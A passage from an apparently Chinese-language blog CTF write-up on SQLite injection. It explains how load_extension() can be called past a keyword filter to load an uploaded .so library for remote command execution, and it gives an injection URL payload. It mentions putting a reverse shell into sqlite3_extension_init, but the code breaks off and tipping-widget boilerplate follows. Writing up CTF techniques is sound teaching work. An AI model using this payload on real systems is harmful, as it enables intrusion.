CTF之SQL注入之load_extension函数

某次ctf比赛时,发现前台存在sql注入,使用的是sqlite数据库,通过报错信息,发现过滤了select、or、and、insert等关键字,但是没有禁止load_extension() 函数

于是可以通过如下方式加载动态库,如windows的dll,linux的so进行远程命令执行,方式如下:

www.abc.com?id=1'||load_extension('/home/poc.so');--

刚好目标网站有一个文件上传接口,可以自己编写动态库,然后上传上去。

从sqlite的官网上,我找到了一个例子:
在这里插入图片描述
load_extension的默认初始化函数不是c语言的main函数,而是sqlite3_extension_init函数,于是我把c语言的反弹shell 写进该函数里面:

/* Add your head
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值